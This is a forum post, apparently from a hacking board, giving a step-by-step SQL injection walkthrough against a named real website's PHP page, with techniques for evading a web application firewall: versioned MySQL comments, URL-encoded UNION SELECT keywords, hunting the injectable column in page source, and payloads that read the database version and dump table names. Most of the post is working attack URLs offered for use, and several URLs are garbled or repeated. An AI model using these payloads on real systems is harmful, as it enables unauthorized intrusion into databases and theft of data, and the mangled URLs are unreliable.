Locked Simple Waf Bypass For Diffrent Errors

[Sn1p3r]

Simple WAF Bypass

 

Today i give you idea as "waf bypass with error 403404406 and also url encode"

 

http://wonderlandthe...rpark.php?wid=5'>http://wonderlandthe...rpark.php?wid=5'>http://wonderlandthe...rpark.php?wid=5'>http://wonderlandthe...rpark.php?wid=5

this is our target and is vulnerable.

 

Find the number of columns:-

 

lets try to find the column's numbers

 

http://wonderlandthe...rpark.php?wid=5 order by 1--

Not work and give a error its means order is not work.

some time in some case order is not work so than try to use group.

means just replace the order with group

 

like:

http://wonderlandthe...rpark.php?wid=5 group by 1--

work :-) like this we increase the numbers until we get an error.

 

http://wonderlandthe...rpark.php?wid=5 group by 4--

we get a error its means it have 3 number of column

 

Now check the "Union fuction"

http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5 union select 123--

not work:/ give a error with 404 and 406.

Now i m tell you little bit knowledge about a 404 and 406 error

Error 404:

when we get 404 error so we need to use filter and other thing. But in this web filter/special comment is work

special comment /*! and */ . using of it we can bypass the 404 error

Error 406:

when we get 406 error so we need to bypass it with union url encoding.

Now come to point.

we use special comment/filter with url encode for bypass our web like :

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 123--

BYpass Posted Image

but i am tell you about 403 error

when we get 403 error so we need to use over lopping on the union and select

like:- /*!00000union*/ /*!00000select*/

 

Now come on our target:

when we use union function we donot see any vuln column number on the page but we see one thing like cracking a pic so it means that the vuln column number hidden one the html code

before open the code we will do some different on the qurey for easy see the vuln number like:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111111--

now open the code and press ctrl+f and put 1 no result than put 11 no result than put 111 and we will get the vuln number.

 

Now find the "Version"

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version()--

not work error on () this now use url encode

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version%28%29--

bypass now open the html code and press ctrl+f and put 5.1 and you will see th version like 5.1.73-cll

now i will try to print the version one the page with using concat()

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111concat%28version%28%29%29--

work but also in html code now i am use html tag like before the '">' use it and after the version use it ' and you also use html tag in hex.

let try to print the version on page

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111concat%28'">'version%28%29' worked Posted Image

 

 

EXTRACTING DATABASE TABLES:-

i will do it with using url encode and filter like

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111group_concat%28/*!'">'table_name*/' wroked :-) done